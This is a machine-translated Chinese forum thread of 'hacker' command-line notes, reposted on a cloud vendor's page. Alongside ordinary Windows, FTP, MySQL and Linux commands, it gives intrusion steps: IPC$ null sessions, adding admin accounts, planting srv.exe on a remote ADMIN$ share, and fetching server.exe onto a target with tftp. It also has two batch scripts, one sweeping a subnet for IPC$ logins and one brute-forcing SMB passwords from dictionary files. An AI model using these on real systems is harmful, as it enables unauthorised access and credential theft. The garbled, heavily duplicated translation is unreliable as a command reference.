Common dos hacker commands

Source: Internet
Author: User
Tags ftp connection net time net send
DOS basics for hackers

Net use $ "> \ IP \ IPC $" "/User:" "Create an empty IPC Link

Net use $ "> \ IP \ IPC $" password "/User:" username "Create an IPC non-empty Link

Net use H: $ ">\\ IP \ C $" password "/User:" User Name "directly logs in and maps to the other Party C: H to the local device:

Net use H: $ ">\\ IP \ C $ after login ing to the other Party C: to the local h:

Net use $ "> \ IP \ IPC $/del Delete the IPC Link

. Net use H:/DEL: Delete the H ing from the ing peer to the local host that is H:

Net user username and password/Add create user

Net user guest/active: yes to activate the Guest user

. Net user.

Net user account name view account attributes

Net localgroup administrators user name/Add add the "user" to the administrator so that it has administrator permissions. Note: Add s to the Administrator and use the plural

Net start to check which services are enabled

. Net start service name. (For example, Net start Telnet and Net start Schedule)

Net stop service name to stop a service

Net time \ target IP address view peer time

Net time \ target IP/set sets the time synchronization between the local computer time and the "target IP" host, and the parameter/Yes can cancel the confirmation information.

. Net view.

Net view \ IP to view which shares are enabled in the Peer LAN

Net config display system network settings

. Net logoff disconnection sharing

. Net pause service name: suspend a service

Net send IP "Text Information" sends information to the recipient

Network Connection type and information being used in the net ver LAN

. NET Share

NET Share IPC $ enable IPC $ share

NET Share IPC $/del Delete IPC $ share

NET Share C $/del Delete C: Share

Net user guest 12345 after logging in with the guest user, change the password to 12345

Net Password Change System Login Password

Netstat-A is usually used to check which ports are enabled.

Netstat-N is commonly used to view the network connection of a port.

Netstat-V view ongoing work

Netstat-P protocol name example: netstat-p tcq/IP to view the usage of a protocol (view the usage of TCP/IP protocol)

Netstat-S: view all protocol usage in use

If an nbtstat-a ip address is enabled on one of the ports from 136 to 139, you can view the user name that the other party recently logged on to (the user name is before 03). Note: Parameter-A must be capitalized.

Tracert-parameter IP (or computer name) Tracking routing (packet), parameter: "-W number" is used to set the timeout interval.

Ping An IP address (or domain name) to send 32-byte data to the host. Parameter: "-l [space] data packet size"; "-N data transmission count "; "-T" indicates that the Ping is always performed.

Ping-T-l 65550 IP address death Ping (send a file larger than 64 KB and ping it until the ping ends)

Ipconfig (winipcfg) is used for Windows NT and XP (Windows 95 98) to view the local IP address. The "/all" parameter of ipconfig shows all configuration information.

Tlist-T displays processes in the tree line list (this is an additional system tool, which is not installed by default and is in the support/tools folder of the installation directory)

After the kill-f process name is added with the-F parameter, a process is forcibly terminated. (This is an additional tool of the system. It is not installed by default. It is in the support/tools folder of the installation directory)

After the Del-F file name and the-F parameter are added, the read-only files can be deleted./AR,/AH,/As, And/AA respectively indicate the deletion of read-only, hidden, system, and archive files, /A-R,/a-h,/a-s,/A-A means to delete files except read-only, hidden, system, archive. For example, "del/AR *. *" means to delete all read-only files in the current directory, "del/A-S *. *" means to delete all files except system files in the current directory

Del/S/Q directory or use: rmdir/S/Q directory/s to delete all subdirectories and files in the directory. At the same time, you can use the parameter/Q to cancel the deletion operation and then delete it directly. (The two commands serve the same purpose)

Move drive letter \ path \ file name to be moved storage path of the mobile file \ move the file name to move the file, use the parameter/y to cancel the confirmation that the Mobile Directory contains the same file prompt and overwrite it directly

FC one.txt two.txt> 3st.txt compares two files and outputs them to the 3st.txt file. ">" and ">" are redirection commands.

At ID: Enable a registered scheduled task

211.100.25 .*

Reference 2nd floor Reply: Common dos hacker commands !!!!!! Stops all scheduled tasks at/delete at, and stops them directly with the/Yes parameter.
At ID/delete: Stop a registered scheduled task
At view all scheduled tasks
At \ IP time Program Name (or a command)/R runs a program of the other party at a certain time and restarts the computer
Finger username @ host
Telnet IP port: Remote and login server, default port: 23
Connecting an open IP address to an IP address (the command after Telnet logon)
Telnet directly type telnet on the local machine to enter the local telnet
Copy path \ file name 1 path \ file name 2/y copy file 1 to the specified directory as file 2, use the parameter/y to cancel the confirmation at the same time you want to rewrite an existing directory file
Copy c: \ srv.exe $ ">\\ IP \ ADMIN $ copy local c: \ srv.exe to the admin
Cppy 1st.jpg/b4242st.txt/A 3st.jpg contains a new file. Note: The 2st.txt File Header must be empty in three rows. Parameter:/B indicates the binary file, And/A indicates the ascll file.
Copy $ \ svv.exe ">\\ IP \ ADMIN $ \ svv.exe C :\or: Copy \ IP \ ADMIN $ \ *. * copy the srv.exe file (all files) shared by the bank administrator to the local C:
The target address of the file or directory tree to be copied in xcopy. \ directory name: copy the file and directory tree. The parameter/y does not prompt to overwrite the same file.
After you get server.exe c: \ server.exe and log on to the target host, download the server.exe file of the specified IP address to the parameter c: \ server.exe of the target host: -I refers to binary transfer, which is used for transferring EXE files. If-I is not added, it is transmitted in ASCII mode (Transfer text file mode ).
After logging on to the TFTP-I peer IP put c: \ server.exe, upload the local c: \ server.exe to the host
The ftp ip port is used to upload files to the server or perform file operations. The default port is 21. Bin refers to binary transfer (executable files). The default value is ASCII transfer (for text files)
Route print displays the IP route. The network address network addres, subnet mask netmask, gateway address addres, and interface address are displayed.
ARP is used to view and process ARP caches. ARP is used to resolve an IP address into a physical MAC address. ARP-A displays all information
Start program name or command/max or/min open a new window and maximize (minimize) run a program or command
Mem view CPU usage
Attrib file name (directory name) to view the attributes of a file (directory)
Attrib file name-a-r-s-h or + A + R + S + H remove (ADD) the archive of a file, read-only, system, and hidden attribute; use + to add an attribute
Dir: view the file. The parameter "/Q" indicates the user of the file and directory system./t: C indicates the file creation time./t: A indicates the last file access time./t: w. last modification time
Date/t, time/t use this parameter, that is, "date/T", "Time/t" will only display the current date and time, without entering a new date and time
Set specifies the environment variable name = the character to be assigned to the variable to set the environment variable
Set displays all current environment variables
Set P (or other characters) displays all environment variables starting with P (or other characters ).
Pause pause the batch processing program and display: press any key to continue ....
If execute condition processing in the batch processing program (for more information, see if command and variable)
The Goto tag directs cmd.exe to the rows with labels in the batch processing program (the tag must be a separate row and headers with colons, for example, the ": Start" tag)
Call path \ batch processing file name call another batch processing program from the batch processing program (for more information, see call /?)
For execution of a specific command on each file in a group of files (for more information, see for command and variable)
Echo ON or OFF enables or disables echo. The current echo settings are displayed only when ECHO is used without parameters.
Echo information is displayed on the screen
Echo information> pass.txt: Save "information" to the pass.txt File
Findstr "hello" aa.txt search for the string hello in the aa.txt File
Find file name to find a file
Title name change the title name of the CMD window
Set the color value to the foreground and background colors of the CMD console; 0 = Black, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = gray, 9 = light blue, A = light green, B = light green, c = light red, D = light purple, E = light yellow, F = light white

211.100.25 .*

Reference Third floor Reply: Common dos hacker commands !!!!!! Stops all scheduled tasks at/delete at, and stops them directly with the/Yes parameter.
At ID/delete: Stop a registered scheduled task
At view all scheduled tasks
At \ IP time program name (or a command)/R runs a program of the other party at a certain time and restarts the computer
Finger username @ host
Telnet IP port: Remote and login server, default port: 23
Connecting an open IP address to an IP address (the command after Telnet logon)
Telnet directly type telnet on the local machine to enter the local telnet
Copy path \ file name 1 path \ file name 2/y copy file 1 to the specified directory as file 2, use the parameter/y to cancel the confirmation at the same time you want to rewrite an existing directory file
Copy c: \ srv.exe $ ">\\ IP \ ADMIN $ copy local c: \ srv.exe to the admin
Cppy 1st.jpg/b4242st.txt/A 3st.jpg contains a new file. Note: The 2st.txt File Header must be empty in three rows. Parameter:/B indicates the binary file, And/A indicates the ascll file.
Copy $ \ svv.exe ">\\ IP \ ADMIN $ \ svv.exe C :\or: Copy \ IP \ ADMIN $ \ *. * copy the srv.exe file (all files) shared by the bank administrator to the local C:
The target address of the file or directory tree to be copied in xcopy. \ directory name: copy the file and directory tree. The parameter/y does not prompt to overwrite the same file.
After you get server.exe c: \ server.exe and log on to the target host, download the server.exe file of the specified IP address to the parameter c: \ server.exe of the target host: -I refers to binary transfer, which is used for transferring EXE files. If-I is not added, it is transmitted in ASCII mode (Transfer text file mode ).
After logging on to the TFTP-I peer IP put c: \ server.exe, upload the local c: \ server.exe to the host
The ftp ip port is used to upload files to the server or perform file operations. The default port is 21. Bin refers to binary transfer (executable files). The default value is ASCII transfer (for text files)
Route print displays the IP route. The network address network addres, subnet mask netmask, gateway address addres, and interface address are displayed.
ARP is used to view and process ARP caches. ARP is used to resolve an IP address into a physical MAC address. ARP-A displays all information
Start program name or command/max or/min open a new window and maximize (minimize) run a program or command
Mem view CPU usage
Attrib file name (directory name) to view the attributes of a file (directory)
Attrib file name-a-r-s-h or + A + R + S + H remove (ADD) the archive of a file, read-only, system, and hidden attribute; use + to add an attribute
Dir: view the file. The parameter "/Q" indicates the user of the file and directory system./t: C indicates the file creation time./t: A indicates the last file access time./t: w. last modification time
Date/t, time/t use this parameter, that is, "date/T", "Time/t" will only display the current date and time, without entering a new date and time
Set specifies the environment variable name = the character to be assigned to the variable to set the environment variable
Set displays all current environment variables
Set P (or other characters) displays all environment variables starting with P (or other characters ).
Pause pause the batch processing program and display: press any key to continue ....
If execute condition processing in the batch processing program (for more information, see if command and variable)
The Goto tag directs cmd.exe to the rows with labels in the batch processing program (the tag must be a separate row and headers with colons, for example, the ": Start" tag)
Call path \ batch processing file name call another batch processing program from the batch processing program (for more information, see call /?)
For execution of a specific command on each file in a group of files (for more information, see for command and variable)
Echo ON or OFF enables or disables echo. The current echo settings are displayed only when ECHO is used without parameters.
Echo information is displayed on the screen
Echo information> pass.txt: Save "information" to the pass.txt File
Findstr "hello" aa.txt search for the string hello in the aa.txt File
Find file name to find a file
Title name change the title name of the CMD window
Set the color value to the foreground and background colors of the CMD console; 0 = Black, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = gray, 9 = light blue, A = light green, B = light green, c = light red, D = light purple, E = light yellow, F = light white

211.100.25 .*

Reference 4th floor Reply: Common dos hacker commands !!!!!! Stops all scheduled tasks at/delete at, and stops them directly with the/Yes parameter.
At ID/delete: Stop a registered scheduled task
At view all scheduled tasks
At \ IP time program name (or a command)/R runs a program of the other party at a certain time and restarts the computer
Finger username @ host
Telnet IP port: Remote and login server, default port: 23
Connecting an open IP address to an IP address (the command after Telnet logon)
Telnet directly type telnet on the local machine to enter the local telnet
Copy path \ file name 1 path \ file name 2/y copy file 1 to the specified directory as file 2, use the parameter/y to cancel the confirmation at the same time you want to rewrite an existing directory file
Copy c: \ srv.exe $ ">\\ IP \ ADMIN $ copy local c: \ srv.exe to the admin
Cppy 1st.jpg/b4242st.txt/A 3st.jpg contains a new file. Note: The 2st.txt File Header must be empty in three rows. Parameter:/B indicates the binary file, And/A indicates the ascll file.
Copy $ \ svv.exe ">\\ IP \ ADMIN $ \ svv.exe C :\or: Copy \ IP \ ADMIN $ \ *. * copy the srv.exe file (all files) shared by the bank administrator to the local C:
The target address of the file or directory tree to be copied in xcopy. \ directory name: copy the file and directory tree. The parameter/y does not prompt to overwrite the same file.
After you get server.exe c: \ server.exe and log on to the target host, download the server.exe file of the specified IP address to the parameter c: \ server.exe of the target host: -I refers to binary transfer, which is used for transferring EXE files. If-I is not added, it is transmitted in ASCII mode (Transfer text file mode ).
After logging on to the TFTP-I peer IP put c: \ server.exe, upload the local c: \ server.exe to the host
The ftp ip port is used to upload files to the server or perform file operations. The default port is 21. Bin refers to binary transfer (executable files). The default value is ASCII transfer (for text files)
Route print displays the IP route. The network address network addres, subnet mask netmask, gateway address addres, and interface address are displayed.
ARP is used to view and process ARP caches. ARP is used to resolve an IP address into a physical MAC address. ARP-A displays all information
Start program name or command/max or/min open a new window and maximize (minimize) run a program or command
Mem view CPU usage
Attrib file name (directory name) to view the attributes of a file (directory)
Attrib file name-a-r-s-h or + A + R + S + H remove (ADD) the archive of a file, read-only, system, and hidden attribute; use + to add an attribute
Dir: view the file. The parameter "/Q" indicates the user of the file and directory system./t: C indicates the file creation time./t: A indicates the last file access time./t: w. last modification time
Date/t, time/t use this parameter, that is, "date/T", "Time/t" will only display the current date and time, without entering a new date and time
Set specifies the environment variable name = the character to be assigned to the variable to set the environment variable
Set displays all current environment variables
Set P (or other characters) displays all environment variables starting with P (or other characters ).
Pause pause the batch processing program and display: press any key to continue ....
If execute condition processing in the batch processing program (for more information, see if command and variable)
The Goto tag directs cmd.exe to the rows with labels in the batch processing program (the tag must be a separate row and headers with colons, for example, the ": Start" tag)
Call path \ batch processing file name call another batch processing program from the batch processing program (for more information, see call /?)
For execution of a specific command on each file in a group of files (for more information, see for command and variable)
Echo ON or OFF enables or disables echo. The current echo settings are displayed only when ECHO is used without parameters.
Echo information is displayed on the screen
Echo information> pass.txt: Save "information" to the pass.txt File
Findstr "hello" aa.txt search for the string hello in the aa.txt File
Find file name to find a file
Title name change the title name of the CMD window
Set the color value to the foreground and background colors of the CMD console; 0 = Black, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = gray, 9 = light blue, A = light green, B = light green, c = light red, D = light purple, E = light yellow, F = light white

211.100.25 .*

Reference 5th floor Reply: Common dos hacker commands !!!!!! Run the command prompt (Change c: \, D: \ To: entsky \) posted on prompt to cmd.exe \)

Print file name print text file

Ver displays version information in the DOS window

In the winver pop-up window, the version information (memory size, system version, patch version, and computer name) is displayed)

Format drive letter/Fs: Type format disk, type: fat, FAT32, NTFS, for example: Format D:/Fs: NTFS

MD directory name create directory

Replace the directory of the source file to be replaced

Rename original file name New File Name

Tree displays the directory in a tree structure, and uses the-F parameter to list the file names in the first folder.

Type file name display text file content

More file names display output files on screen

Doskey command to be locked = character

Doskey UNLOCK command = Lock Command provided for DOS (edit command line, re-call Win2k command, and create macro ). For example, run the following command to lock the Dir: doskey dir = entsky (doskey dir = dir cannot be used); unlock: doskey dir =

Taskmgr call up the Task Manager

Chkdsk/f d: Check disk D and display status report; add parameter/F and fix disk errors

Tlntadmn telnt service admn, type tlntadmn to select 3, and then select 8, you can change Telnet service default port 23 to any other port

Exit to exit the cmd.exe program. Currently, the parameter/B is used to exit the current batch processing script, not cmd.exe.

Path \ the file name of the executable file sets a path for the executable file.

CMD starts a Windows 2 K Command explanation window. Parameters:/Eff,/EN, and enable command extension. For more information, see CMD /?

Regedit/s registry file name import to registry; parameter/s indicates quiet mode import, no prompt;

Regedit/e registry file name export Registry

Cacls file name parameters display or modify the file access control list (ACL)-for NTFs format. Parameter:/d User name: Set to deny access to a user;/P User name: perm to replace the access permission of the specified user;/g User name: perm to grant the access permission to the specified user; perm can be: N none, r read, W write, c Change (write), f full control; for example: cacls D: \ test.txt/d pub set D: \ test.txt to reject pub user access.

Cacls file name to view the object access user permission list

Add annotation to the batch file for REM text content

Netsh to view or change the local network configuration

IIS service command:

Iisreset/reboot restart Win2k computer (but a message is prompted that the system will restart)

Iisreset/start or stop all Internet services

Iisreset/restart stop and restart all Internet services

Iisreset/status displays the status of all Internet services

Enable or disable Internet service restart on the local system

Iisreset/rebootonerror when the Internet service is started, stopped, or restarted, the system restarts if an error occurs.

Iisreset/noforce: if the Internet service cannot be stopped, the internet service will not be forcibly terminated.

Iisreset/timeout Val does not stop the internet service when it reaches the time (in seconds). If the/rebootonerror parameter is specified, the computer restarts. The default value is restart for 20 seconds, stop for 60 seconds, and restart for 0 seconds.

FTP command: (details are provided later)

The FTP command line format is:

FTP-v-d-I-n-g [host name]-V displays all the response information of the remote server.

-D. Use the debugging method.

-N restrict FTP automatic logon, that is, the. netrc file is not used.

-G cancels the global file name.

Help [command] or? [Command] view command instructions

Bye or quit terminates the FTP process on the host and exits FTP management.

PWD list the current remote host directory

Put or send local file name [file name uploaded to the host] transfers a local file to the remote host

Get or Recv [remote host file name] [download to local file name] transfer from remote host to local host

Mget [Remote-files] receives a batch of files from the remote host to the local host.

Mput local-files transfers a batch of files from the local host to the remote host

DIR or ls [Remote-Directory] [local-file] to list files in the directory of the current remote host. If a local file exists, write the result to the local file.

ASCII settings transfer files in ASCII mode (default)

211.100.25 .*

Reference 6th Floor Reply: Common dos hacker commands !!!!!! Published on bin or image settings to transfer files in binary mode

Bell sends an alarm every time a file is transferred.

Cdup returns to the upper-level directory

Close interrupts the FTP session with the remote server (corresponds to open)

Open host [port] To establish a connection to the specified FTP server. You can specify the connection port.

Delete Delete delete files from the remote host

Mdelete [Remote-files] deletes a batch of Files

Mkdir directory-Name: create a directory in the remote host

RENAME [from] [to] Change the file name in the remote host

Rmdir directory-Name: Delete the directory in the remote host

Status: displays the status of the current FTP

System displays the remote host system type

User user-name [Password] [account] log on to the remote host with another user name

Open host [port] re-establishes a new connection

Prompt interaction prompt Mode

Macdef macro commands

The LCD changes the working directory of the current local host. If it is set to default, it is transferred to the Home Directory of the current user.

Chmod changes the File Permission of the remote host

When the case is on, use the mget command to copy the file name to the local machine, convert all to lowercase letters

CD remote-Dir: Enter the remote host directory

Cdup enters the parent directory of the remote host directory

! Execute the interactive shell on the local machine and exit to return to the FTP environment, such! Ls *. Zip

MySQL command:

Mysql-H host address-u user name-P password to connect to MySQL; If MySQL is just installed, the Super User Root has no password.

(For example, MySQL-h110.110.110.110-uroot-p123456)

Note: U and root do not need to add spaces. The same applies to others)

Exit to exit MySQL

Mysqladmin-u username-P old Password New Password Change Password

Grant select on database. * To username @ login host identified by \ "password \"; Add new users. (Note: Unlike the above, the following commands in the MySQL environment are followed by a semicolon as the command Terminator)

Show databases; displays the Database List. At the beginning, there were only two databases: MySQL and test. The MySQL database contains the MySQL system information. We change the password and add new users to use this database for operations.

Use MySQL;

Show tables; displays data tables in the database

Describe table name; displays the table structure

Create Database database name; database creation

Use Database Name;

Create Table Name (field setting list); Create Table

Drop database database name;

Drop table name; delete database and table

Delete from table name; clear table records

Select * from table name; displays records in the table

Mysqldump -- opt school> School. bbb backup database: (the command is executed in the DOS \ mysql \ bin directory); Note: Back up the database school to school. bbb file, school. bbb is a text file with any file name. Open it and you will find a new one.

Add commands in win2003 System (practical part ):

Shutdown/the parameter disables or restarts the local or remote host.

Parameter description:/s disables the host,/R restarts the host,/t number sets the delay time, range 0 ~ Within 180 seconds,/A will cancel the boot and/M // the remote host specified by the IP address.

Example: shutdown/R/T 0 restart the local host immediately (no delay)

Taskill/the parameter process name or PID of the process to terminate one or more tasks and processes.

Parameter description:/PID indicates the PID of the process to be terminated. You can use the tasklist command to obtain the PID of each process, the name of the process to be terminated by the IM, And/F to forcibly terminate the process, /t terminate the specified process and its sub-processes.

Tasklist displays the process identifier (PID) of processes, services, and services currently running on local and remote hosts ).

Parameter description:/M lists the DLL files loaded by the current process./svc displays the services of each process. If no parameter is set, only the current process is listed.

Basic commands in Linux: Case Sensitive

Uname: displays version information (same as that of Win2k)

Dir: displays the current directory file. ls-AL: displays hidden files (same as windows 2 k DIR)

PWD query the current directory location

CD .. go back to the previous directory. Note that there is a space between CD and. CD/return to the root directory.

Cat file name View File Content

Cat> abc.txt write the content into the abc.txt file.

The more File Name displays a text file on one page.

CP copy file

MV mobile File

RM file name delete file, Rm-a directory name Delete directory and subdirectory

211.100.25 .*

Reference 7 th floor Reply: Common dos hacker commands !!!!!! Posted on mkdir directory name to create a directory

Rmdir: Delete the sub-directory. There is no document in the directory.

Chmod sets the access permission for files or directories

Grep searches for strings in the file

Comparison of diff Archives

Find file search

Current date and time of date

Who queries the people who are using the same machine as you and the login time and location

W. query the detailed information of the current host.

Whoami

Groups

Passwd Change Password

History

PS displays the Process status

Kill to stop a process

GCC hackers usually use it to compile files written in C language.

Su permission conversion to specified user

Telnet the IP address to connect to the host (same as Win2k). When bash $ is displayed, the connection is successful.

FTP connection to a server (same as Win2k)

Appendix: batch processing commands and variables

1: Basic Format of for commands and variables:

For/parameter % variable in (SET) do command [command_parameters] % variable: specify a parameter that can be replaced by a single letter, for example, % I, and specify a variable: % I, which is case sensitive (% I is not equal to % I ).

Each batch processing can process 10 variables from % 0-% 9, of which % 0 is used by default for batch file names, % 1 is the first value input when this batch is used by default. Similarly, % 2-% 9 indicates the input value 2-9. For example: net use $ "> \ IP \ IPC $ pass/User: the IP address in user is % 1, pass is % 2, and user is % 3

(SET): Specifies one or more files. Wildcards can be used, such as: (D: \ user.txt) and (1 1 254) (1-1 254 ), {"(1 254)" the first "1" indicates the start value, the second "1" indicates the growth volume, and the third "254" indicates the end value, that is: from 1 to 254; "(1-1 254)" Description: from 254 to 1}

Command: Specifies the command to be executed on the first file, such as the net use command. If you want to execute multiple commands, the command is separated: &.

Command_parameters: specify a parameter or command line switch for a specific command

In (SET): refers to the value in (SET); do command: refers to the execution of command

Parameter:/L indicates the incremental form {(SET) is the incremental form};/F indicates the constant value from the file until it is obtained {(SET) is the file, for example, (D: \ pass.txt }.

Example:

@ Echo off

Echo format: Test. bat *. *. *> test.txt

For/L % G in (1 254) Do echo % 1.% G> test.txt & net use \ % 1.% G/User: Administrator | find "command completed successfully"> test.txt

Saved as test. Bat Description: running.

/L indicates the incremental format (from 1-254 or-1); the first three digits of the input IP Address :*. *. * The default value is % 1 for batch processing. % G is the variable (the last digit of the IP address). & it is used to separate the echo and net use commands; | indicates that after IPC $ is created, use find in the result to check whether "command is successfully completed" information; % 1.% G is the complete IP address. (1 1 254) indicates the starting value, growth volume, and end value.

@ Echo off

Echo format: OK. Bat IP

For/F % I In (d: \ User. DIC) Do smb.exe % 1% % I D: \ Pass. DIC 200

Save as: OK .exe Description: after entering an IP address, use the dictionary file D: \ Pass. DIC to crack the user password in D: \ User. DIC until the value of the file is obtained. % I is the user name; % 1 is the input IP address (default ).

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.